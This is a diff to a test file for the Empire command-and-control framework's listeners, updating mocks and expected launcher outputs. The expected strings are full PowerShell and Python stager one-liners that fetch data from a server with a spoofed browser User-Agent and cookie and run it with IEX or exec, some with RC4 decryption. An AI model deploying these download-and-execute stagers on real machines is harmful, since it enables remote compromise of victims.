@@ -39,6 +39,8 @@ def test_http_generate_launcher(monkeypatch, main_menu_mock):
 
     http_listener.options["Cookie"]["Value"] = "l33th4x0r"
     http_listener.options["Host"]["Value"] = "http://localhost"
+    http_listener.options["Port"]["Value"] = "80"
+    http_listener.host_address = "http://localhost/"
     main_menu_mock.listeners.activeListeners = {
         "fake_listener": {"options": http_listener.options}
     }
@@ -69,11 +71,20 @@ def test_http_foreign_generate_launcher(monkeypatch, main_menu_mock):
     http_foreign_listener = Listener(main_menu_mock)
 
     http_foreign_listener.options["Host"]["Value"] = "http://localhost"
+    http_foreign_listener.options["Port"]["Value"] = "80"
     http_foreign_listener.options["RoutingPacket"]["Value"] = "cm91dGluZyBwYWNrZXQ="
+    http_foreign_listener.host_address = "http://localhost/"
     main_menu_mock.listeners.activeListeners = {
         "fake_listener": {"options": http_foreign_listener.options}
     }
 
+    validate_listener_address_mock = MagicMock()
+    validate_listener_address_mock.return_value = ("http://localhost/", None)
+    main_menu_mock.listenersv2 = MagicMock()
+    main_menu_mock.listenersv2.validate_listener_address = (
+        validate_listener_address_mock
+    )
+
     http_foreign_listener.threads = {"fake_listener": {"fake_thread": {}}}
 
     python_launcher = http_foreign_listener.generate_launcher(
@@ -105,12 +116,23 @@ def test_http_hop_generate_launcher(monkeypatch, main_menu_mock):
     http_hop_listener = Listener(main_menu_mock)
 
     http_hop_listener.options["Host"]["Value"] = "http://localhost"
+    http_hop_listener.options["Port"]["Value"] = "80"
+    http_hop_listener.host_address = "http://localhost/"
     http_hop_listener.options["DefaultProfile"]["Value"] = (
         "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
     )
     main_menu_mock.listeners.activeListeners = {
         "fake_listener": {"options": http_hop_listener.options}
     }
+    http_hop_listener.session_cookie = "session"
+
+    # create listenersv2 mock and set both methods on the SAME instance
+    listenersv2 = MagicMock()
+    listenersv2.get_active_listener_by_name.return_value = http_hop_listener
+    listenersv2.validate_listener_address.return_value = ("http://localhost/", None)
+
+    # attach to main_menu_mock
+    main_menu_mock.listenersv2 = listenersv2
 
     http_hop_listener.threads = {"fake_listener": {"fake_thread": {}}}
 
@@ -155,11 +177,20 @@ def test_http_malleable_generate_launcher(monkeypatch, main_menu_mock):
         "empire.server.listeners.http_malleable.SessionLocal", session_mock
     )
 
+    validate_listener_address_mock = MagicMock()
+    validate_listener_address_mock.return_value = ("http://localhost/", None)
+    main_menu_mock.listenersv2 = MagicMock()
+    main_menu_mock.listenersv2.validate_listener_address = (
+        validate_listener_address_mock
+    )
+
     http_malleable_listener = Listener(main_menu_mock)
     http_malleable_listener.options["Profile"]["Value"] = "amazon.profile"
     http_malleable_listener.validate_options()
 
     http_malleable_listener.options["Host"]["Value"] = "http://localhost"
+    http_malleable_listener.options["Port"]["Value"] = "80"
+
     main_menu_mock.listeners.activeListeners = {
         "fake_listener": {"options": http_malleable_listener.options}
     }
@@ -234,6 +265,16 @@ def test_port_forward_pivot_generate_launcher(monkeypatch, main_menu_mock):
     # redirector doesn't get these fields until the listener is started.
     port_forward_pivot.options.update(HttpListener(main_menu_mock).options)
     port_forward_pivot.options["Host"] = {"Value": "http://localhost"}
+    port_forward_pivot.options["Port"] = {"Value": "80"}
+    port_forward_pivot.host_address = "http://localhost/"
+
+    validate_listener_address_mock = MagicMock()
+    validate_listener_address_mock.return_value = ("http://localhost/", None)
+    main_menu_mock.listenersv2 = MagicMock()
+    main_menu_mock.listenersv2.validate_listener_address = (
+        validate_listener_address_mock
+    )
+
     main_menu_mock.listeners.activeListeners = {
         "fake_listener": {"options": port_forward_pivot.options}
     }
@@ -254,7 +295,7 @@ def test_port_forward_pivot_generate_launcher(monkeypatch, main_menu_mock):
 
 
 def _expected_http_powershell_launcher():
-    return """$ErrorActionPreference = "SilentlyContinue";$wc=New-Object System.Net.WebClient;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$ser=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwBsAG8AYwBhAGwAaABvAHMAdAA=')));$t='/admin/get.php';$wc.Headers.Add('User-Agent',$u);$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;$Script:Proxy = $wc.Proxy;$K=[System.Text.Encoding]::ASCII.GetBytes('@3uiSPNG;mz|{5#1tKCHDZ*dFs87~g,}');$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};$wc.Headers.Add("Cookie","l33th4x0r=cm91dGluZyBwYWNrZXQ=");$data=$wc.DownloadData($ser+$t);$iv=$data[0..3];$data=$data[4..$data.length];-join[Char[]](& $R $data ($IV+$K))|IEX"""
+    return """$ErrorActionPreference = "SilentlyContinue";$wc=New-Object System.Net.WebClient;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$ser=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwBsAG8AYwBhAGwAaABvAHMAdAAvAA==')));$t='/admin/get.php';$wc.Headers.Add('User-Agent',$u);$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;$Script:Proxy = $wc.Proxy;$K=[System.Text.Encoding]::ASCII.GetBytes(\'@3uiSPNG;mz|{5#1tKCHDZ*dFs87~g,}\');$wc.Headers.Add("Cookie","l33th4x0r=cm91dGluZyBwYWNrZXQ=");$data=$wc.DownloadData($ser+$t);IEX ([Text.Encoding]::UTF8.GetString($data))"""
 
 
 def _expected_http_python_launcher():
@@ -262,33 +303,20 @@ def _expected_http_python_launcher():
         """
         import sys;
         import urllib.request;
-        UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';server='http://localhost';t='/admin/get.php';
+        UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';server='http://localhost/';t='/admin/get.php';
         req=urllib.request.Request(server+t);
         proxy = urllib.request.ProxyHandler();
         o = urllib.request.build_opener(proxy);
         o.addheaders=[('User-Agent',UA), ("Cookie", "l33th4x0r=cm91dGluZyBwYWNrZXQ=")];
         urllib.request.install_opener(o);
-        a=urllib.request.urlopen(req).read();
-        IV=a[0:4];
-        data=a[4:];
-        key=IV+'@3uiSPNG;mz|{5#1tKCHDZ*dFs87~g,}'.encode('UTF-8');
-        S,j,out=list(range(256)),0,[];
-        for i in list(range(256)):
-            j=(j+S[i]+key[i%len(key)])%256;
-            S[i],S[j]=S[j],S[i];
-        i=j=0;
-        for char in data:
-            i=(i+1)%256;
-            j=(j+S[i])%256;
-            S[i],S[j]=S[j],S[i];
-            out.append(chr(char^S[(S[i]+S[j])%256]));
-        exec(''.join(out));
+        data=urllib.request.urlopen(req).read();
+        exec(data);
         """
     ).strip("\n")
 
 
 def _expected_http_foreign_powershell_launcher():
-    return """$ErrorActionPreference = "SilentlyContinue";$wc=New-Object System.Net.WebClient;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$wc.Headers.Add('User-Agent',$u);$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;$K=[System.Text.Encoding]::ASCII.GetBytes('@3uiSPNG;mz|{5#1tKCHDZ*dFs87~g,}');$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};$wc.Headers.Add("Cookie","session=cm91dGluZyBwYWNrZXQ=");$ser= $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwBsAG8AYwBhAGwAaABvAHMAdAA=')));$t='/admin/get.php';$data=$wc.DownloadData($ser+$t);$iv=$data[0..3];$data=$data[4..$data.length];-join[Char[]](& $R $data ($IV+$K))|IEX"""
+    return """$ErrorActionPreference = "SilentlyContinue";$wc=New-Object System.Net.WebClient;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$wc.Headers.Add('User-Agent',$u);$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;$K=[System.Text.Encoding]::ASCII.GetBytes('@3uiSPNG;mz|{5#1tKCHDZ*dFs87~g,}');$wc.Headers.Add("Cookie","session=cm91dGluZyBwYWNrZXQ=");$ser= $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwBsAG8AYwBhAGwAaABvAHMAdAAvAA==')));$t='/admin/get.php';$data=$wc.DownloadData($ser+$t);IEX ([Text.Encoding]::UTF8.GetString($data))"""
 
 
 def _expected_http_foreign_python_launcher():
@@ -297,27 +325,14 @@ def _expected_http_foreign_python_launcher():
         import sys;
         o=__import__({2:'urllib2',3:'urllib.request'}[sys.version_info[0]],fromlist=['build_opener']).build_opener();
         UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';
-        server='http://localhost';t='/admin/get.php';
+        server='http://localhost/';t='/admin/get.php';
         o.addheaders=[('User-Agent',UA), ("Cookie", "session=cm91dGluZyBwYWNrZXQ=")];
         import urllib.request;
         proxy = urllib.request.ProxyHandler();
         o = urllib.request.build_opener(proxy);
         urllib.request.install_opener(o);
-        a=o.open(server+t).read();
-        IV=a[0:4];
-        data=a[4:];
-        key=IV+'@3uiSPNG;mz|{5#1tKCHDZ*dFs87~g,}'.encode('UTF-8');
-        S,j,out=list(range(256)),0,[];
-        for i in list(range(256)):
-            j=(j+S[i]+key[i%len(key)])%256;
-            S[i],S[j]=S[j],S[i];
-        i=j=0;
-        for char in data:
-            i=(i+1)%256;
-            j=(j+S[i])%256;
-            S[i],S[j]=S[j],S[i];
-            out.append(chr(char^S[(S[i]+S[j])%256]));
-        exec(''.join(out));
+        data=o.open(server+t).read();
+        exec(data);
         """
     ).strip("\n")
 
@@ -327,33 +342,20 @@ def _expected_http_hop_python_launcher():
         """
         import sys;
         import urllib.request;
-        UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';server='http://localhost';t='/admin/get.php';hop='fake_listener';
+        UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';server='http://localhost/';t='/admin/get.php';hop='fake_listener';
         req=urllib.request.Request(server+t);
         proxy = urllib.request.ProxyHandler();
         o = urllib.request.build_opener(proxy);
         o.addheaders=[('User-Agent',UA), ("Cookie", "session=cm91dGluZyBwYWNrZXQ=")];
         urllib.request.install_opener(o);
-        a=urllib.request.urlopen(req).read();
-        IV=a[0:4];
-        data=a[4:];
-        key=IV+''.encode('UTF-8');
-        S,j,out=list(range(256)),0,[];
-        for i in list(range(256)):
-            j=(j+S[i]+key[i%len(key)])%256;
-            S[i],S[j]=S[j],S[i];
-        i=j=0;
-        for char in data:
-            i=(i+1)%256;
-            j=(j+S[i])%256;
-            S[i],S[j]=S[j],S[i];
-            out.append(chr(char^S[(S[i]+S[j])%256]));
-        exec(''.join(out));
+        data=urllib.request.urlopen(req).read();
+        exec(data);
     """
     ).strip("\n")
 
 
 def _expected_http_hop_powershell_launcher():
-    return """$ErrorActionPreference = "SilentlyContinue";$wc=New-Object System.Net.WebClient;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$wc.Headers.Add('User-Agent',$u);$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;$K=[System.Text.Encoding]::ASCII.GetBytes('');$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};$wc.Headers.Add("Cookie","session=cm91dGluZyBwYWNrZXQ=");$ser=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwBsAG8AYwBhAGwAaABvAHMAdAA=')));$t='/admin/get.php';$hop='fake_listener';$data=$wc.DownloadData($ser+$t);$iv=$data[0..3];$data=$data[4..$data.length];-join[Char[]](& $R $data ($IV+$K))|IEX"""
+    return """$ErrorActionPreference = "SilentlyContinue";$wc=New-Object System.Net.WebClient;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$wc.Headers.Add('User-Agent',$u);$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;$K=[System.Text.Encoding]::ASCII.GetBytes('');$wc.Headers.Add("Cookie","session=cm91dGluZyBwYWNrZXQ=");$ser=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwBsAG8AYwBhAGwAaABvAHMAdAAvAA==')));$t='/admin/get.php';$hop='fake_listener';$data=$wc.DownloadData($ser+$t);IEX ([Text.Encoding]::UTF8.GetString($data))"""
 
 
 def _expected_http_malleable_python_launcher():
@@ -361,7 +363,7 @@ def _expected_http_malleable_python_launcher():
         """
         import sys,base64
         import urllib.request,urllib.parse
-        server='http://localhost'
+        server='http://localhost/'
         proxy = urllib.request.ProxyHandler()
         o = urllib.request.build_opener(proxy)
         urllib.request.install_opener(o)
@@ -371,28 +373,15 @@ def _expected_http_malleable_python_launcher():
         req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko')
         req.add_header('Cookie','session=cm91dGluZyBwYWNrZXQ%3D')
         res=urllib.request.urlopen(req)
-        a=res.read()
-        a=urllib.request.urlopen(req).read();
-        IV=a[0:4];
-        data=a[4:];
-        key=IV+'@3uiSPNG;mz|{5#1tKCHDZ*dFs87~g,}'.encode('UTF-8');
-        S,j,out=list(range(256)),0,[];
-        for i in list(range(256)):
-            j=(j+S[i]+key[i%len(key)])%256;
-            S[i],S[j]=S[j],S[i];
-        i=j=0;
-        for char in data:
-            i=(i+1)%256;
-            j=(j+S[i])%256;
-            S[i],S[j]=S[j],S[i];
-            out.append(chr(char^S[(S[i]+S[j])%256]));
-        exec(''.join(out));
+        data=res.read()
+        data=urllib.request.urlopen(req).read();
+        exec(data);
     """
     ).strip("\n")
 
 
 def _expected_http_malleable_powershell_launcher():
-    return """$ErrorActionPreference = "SilentlyContinue";$K=[System.Text.Encoding]::ASCII.GetBytes('@3uiSPNG;mz|{5#1tKCHDZ*dFs87~g,}');$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};$wc=New-Object System.Net.WebClient;$ser=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwBsAG8AYwBhAGwAaABvAHMAdAA6ADgAMAA=')));$t='/zxxuhptp/';$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;$Script:Proxy = $wc.Proxy;$wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko");$wc.Headers.Add("Cookie","session=cm91dGluZyBwYWNrZXQ%3D");$data=$wc.DownloadData($ser+$t);$iv=$data[0..3];$data=$data[4..($data.length-1)];-join[Char[]](& $R $data ($IV+$K))|IEX"""
+    return """$ErrorActionPreference = "SilentlyContinue";$K=[System.Text.Encoding]::ASCII.GetBytes('@3uiSPNG;mz|{5#1tKCHDZ*dFs87~g,}');$wc=New-Object System.Net.WebClient;$ser=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwBsAG8AYwBhAGwAaABvAHMAdAA6ADgAMAA=')));$t='/zxxuhptp/';$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;$Script:Proxy = $wc.Proxy;$wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko");$wc.Headers.Add("Cookie","session=cm91dGluZyBwYWNrZXQ%3D");$data=$wc.DownloadData($ser+$t);IEX ([Text.Encoding]::UTF8.GetString($data))"""
 
 
 def _fake_malleable_profile():
@@ -487,30 +476,17 @@ def _expected_redirector_python_launcher():
     return dedent(
         """
         import sys;import urllib.request;
-        UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';server='http://localhost';t='/admin/get.php';req=urllib.request.Request(server+t);
+        UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';server='http://localhost/';t='/admin/get.php';req=urllib.request.Request(server+t);
         req.add_header('User-Agent',UA);
         req.add_header('Cookie',"session=cm91dGluZyBwYWNrZXQ=");
         proxy = urllib.request.ProxyHandler();
         o = urllib.request.build_opener(proxy);
         urllib.request.install_opener(o);
-        a=urllib.request.urlopen(req).read();
-        IV=a[0:4];
-        data=a[4:];
-        key=IV+'@3uiSPNG;mz|{5#1tKCHDZ*dFs87~g,}'.encode('UTF-8');
-        S,j,out=list(range(256)),0,[];
-        for i in list(range(256)):
-            j=(j+S[i]+key[i%len(key)])%256;
-            S[i],S[j]=S[j],S[i];
-        i=j=0;
-        for char in data:
-            i=(i+1)%256;
-            j=(j+S[i])%256;
-            S[i],S[j]=S[j],S[i];
-            out.append(chr(char^S[(S[i]+S[j])%256]));
-        exec(''.join(out));
+        data=urllib.request.urlopen(req).read();
+        exec(data);
     """
     ).strip("\n")
 
 
 def _expected_redirector_powershell_launcher():
-    return """$ErrorActionPreference = "SilentlyContinue";$wc=New-Object System.Net.WebClient;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$wc.Headers.Add('User-Agent',$u);$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;$Script:Proxy = $wc.Proxy;$K=[System.Text.Encoding]::ASCII.GetBytes('@3uiSPNG;mz|{5#1tKCHDZ*dFs87~g,}');$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};$ser=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwBsAG8AYwBhAGwAaABvAHMAdAA=')));$t='/admin/get.php';$hop='fake_listener';$wc.Headers.Add("Cookie","session=cm91dGluZyBwYWNrZXQ=");$data=$wc.DownloadData($ser+$t);$iv=$data[0..3];$data=$data[4..$data.length];-join[Char[]](& $R $data ($IV+$K))|IEX"""
+    return """$ErrorActionPreference = "SilentlyContinue";$wc=New-Object System.Net.WebClient;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$wc.Headers.Add('User-Agent',$u);$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;$Script:Proxy = $wc.Proxy;$K=[System.Text.Encoding]::ASCII.GetBytes('@3uiSPNG;mz|{5#1tKCHDZ*dFs87~g,}');$ser=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwBsAG8AYwBhAGwAaABvAHMAdAAvAA==')));$t='/admin/get.php';$hop='fake_listener';$wc.Headers.Add("Cookie","session=cm91dGluZyBwYWNrZXQ=");$data=$wc.DownloadData($ser+$t);$iv=$data[0..3];$data=$data[4..$data.length];-join[Char[]](& $R $data ($IV+$K))|IEX"""
